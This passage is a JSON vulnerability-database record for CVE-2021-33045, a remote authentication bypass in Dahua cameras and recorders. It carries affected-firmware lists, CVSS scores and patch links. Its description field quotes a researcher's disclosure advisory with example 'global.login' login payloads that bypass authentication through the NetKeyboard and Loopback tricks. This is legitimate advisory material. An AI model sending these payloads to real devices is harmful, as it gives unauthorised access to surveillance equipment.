"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-4x04_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000001.1.r.210709",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-4x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x04_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x04:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x08_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x08:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-5x16_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-5x16:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x16_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x16:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:xvr-7x32_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.001.0000003.1.r.210710",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:xvr-7x32:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bashis",
"sources": [
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 0.1
},
"cve": "CVE-2021-33045",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2021-33045",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-103420",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2021-70815",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-33045",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-33045",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2021-103420",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-70815",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202109-1081",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. plural Dahua The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Dahua IPC is a series of industrial computer from Dahua of China Dahua Company. Zhejiang Dahua Technology Co., Ltd. is a leading monitoring product supplier and solution service provider. [STX]\n\nSubject: [Update]: Dahua Authentication bypass (CVE-2021-33044, CVE-2021-33045)\n\nAttack vector: Remote\nAuthentication: Anonymous (no credentials needed)\nResearcher: bashis \u003cmcw noemail eu\u003e (2021)\nLimited Disclosure: September 6, 2021\nFull Disclosure: October 6, 2021\nPoC: https://github.com/mcw0/DahuaConsole\n\n-=[Dahua]=-\nAdvisory: https://www.dahuasecurity.com/support/cybersecurity/details/957\nFirmware: https://www.dahuasecurity.com/support/downloadCenter/firmware\n\n-=[Timeline]=-\nJune 13, 2021: Initiated contact with Dahua PSIRT (CyberSecurity@dahuatech.com)\nJune 17, 2021: Sent reminder to Dahua PSIRT\nJune 18, 2021: Asked IPVM for help to get in contact with Dahua\nJune 18, 2021: Received ACK from IPVM, told they sent note to Dahua\nJune 19, 2021: ACK received from Dahua PSIRT, asked for additional details\nJune 19, 2021: Additional details including PoC sent\nJune 21, 2021: ACK received, vulnerabilites confirmed\nJune 23, 2021: Dahua PSIRT asked for \"coordinated disclosure\"\nJune 23, 2021: Confirmed 90 days before my disclosure, said they may release updated firmware anytime from now\nJune 24, 2021: Received CVE-2021-33044, I asked about the second CVE\nJuly 03, 2021: Received CVE-2021-33045, Dahua PSIRT asked again for \"coordinated disclosure\"\nJuly 04, 2021: Confirmed \"coordinated disclosure\", once again\nJuly 05, 2021: Dahua PSIRT tried convince me for \"Full Disclosure\" for vendor only, and \"Limited Disclosure\" for outside world\nJuly 05, 2021: Disagreed, told I will let Dahua PSIRT read my note before \"Limited Disclosure\" September 6, 2021. \n \"Full Disclosure\" will be October 6, 2021,\nAugust 30, 2021: Dahua PSIRT asked to read my \"Limited Disclosure\" note\nAugust 30, 2021: Sent my \"Limited Disclosure\" note\nSeptember 1, 2021: Dahua PSIRT informing about release of their Security Advisory and firmware updates\nSeptember 1, 2021: Notified Dahua PSIRT that I cannot find firmware updates for my IPC/VTH/VTO devices\nSeptember 2, 2021: Dahua PSIRT pointed oversea website, asked for what models I have so Dahua could release firmware\nSeptember 2, 2021: Refused to provide details, as I do expect me to find firmware on their website\nSeptember 3, 2021: Dahua PSIRT informed that R\u0026D will upload updated firmware in batches\nSeptember 6, 2021: Limited Disclosure\nOctober 6, 2021: Full Disclosure\n\n\n-=[NetKeyboard Vulnerability]=-\n\nCVE-2021-33044\n\nVulnerability:\n \"clientType\": \"NetKeyboard\",\nVulnerable device types: IPC/VTH/VTO (tested)\nVulnerable Firmware: Those devices who do not support \"NetKeyboard\" functionality (older than June 2021)\nProtocol: DHIP and HTTP/HTTPS\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence will simply bypass authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n[Example]\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"loginType\": \"Direct\",\n \"clientType\": \"NetKeyboard\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"Not Used\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n-=[Loopback Vulnerability]=-\n\nCVE-2021-33045\n\nVulnerability:\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n\nVulnerable device types: IPC/VTH/VTO/NVR/DVR (tested)\nVulnerable Firmware: Firmware version older than beginning/mid 2020. \nProtocol: DHIP\n\nDetails:\nSetting above \"Vulnerability\" on \"Vulnerable device types\" during 1st or 2nd \"global.login\" sequence pretends that the login request comes from \"loopback\" and will therefore bypass legitimate authentication. \n\nSuccessful bypass returns: {\"id\":1,\"params\":{\"keepAliveInterval\":60},\"result\":true,\"session\":\u003csessionID\u003e}\n\n\n[Example]\nRandom MD5 with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Default\",\n \"password\": \"[REDACTED]\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\nPlain text with l/p: admin/admin\n{\n \"method\": \"global.login\",\n \"params\":\n {\n \"userName\": \"admin\",\n \"ipAddr\": \"127.0.0.1\",\n \"loginType\": \"Loopback\",\n \"clientType\": \"Local\",\n \"authorityType\": \"Default\",\n \"passwordType\": \"Plain\",\n \"password\": \"admin\"\n },\n \"id\": 1,\n \"session\": 0\n}\n\n[ETX]\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "PACKETSTORM",
"id": "164423"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33045",
"trust": 4.6
},
{
"db": "PACKETSTORM",
"id": "164423",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-103420",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2021-70815",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-33045",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"id": "VAR-202109-1874",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
}
]
},
"last_update_date": "2023-12-18T12:16:17.179000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DHCC-SA-202106-001",
"trust": 0.8,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"title": "Patch for Dahua IPC Authentication Bypass Vulnerability (CNVD-2021-103420)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/311541"
},
{
"title": "Patch for Identity authentication bypass vulnerability in some Dahua products (CNVD-2021-70815)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/290746"
},
{
"title": "Dahua IPC Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=164676"
},
{
"title": "PoC",
"trust": 0.1,
"url": "https://github.com/mcw0/poc "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://packetstormsecurity.com/files/164423/dahua-authentication-bypass.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2021/oct/13"
},
{
"trust": 2.3,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/957"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33045"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/poc"
},
{
"trust": 0.1,
"url": "https://github.com/mcw0/dahuaconsole"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33044"
},
{
"trust": 0.1,
"url": "https://www.dahuasecurity.com/support/downloadcenter/firmware"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"db": "VULMON",
"id": "CVE-2021-33045"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"db": "PACKETSTORM",
"id": "164423"
},
{
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"date": "2022-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"date": "2021-10-06T15:11:51",
"db": "PACKETSTORM",
"id": "164423"
},
{
"date": "2021-09-15T22:15:10.687000",
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"date": "2021-09-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-103420"
},
{
"date": "2021-09-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-70815"
},
{
"date": "2022-08-31T02:43:00",
"db": "JVNDB",
"id": "JVNDB-2021-012414"
},
{
"date": "2021-12-02T13:49:55.440000",
"db": "NVD",
"id": "CVE-2021-33045"
},
{
"date": "2021-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Dahua\u00a0 Product certification vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-012414"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202109-1081"
}
],
"trust": 0.6
}
}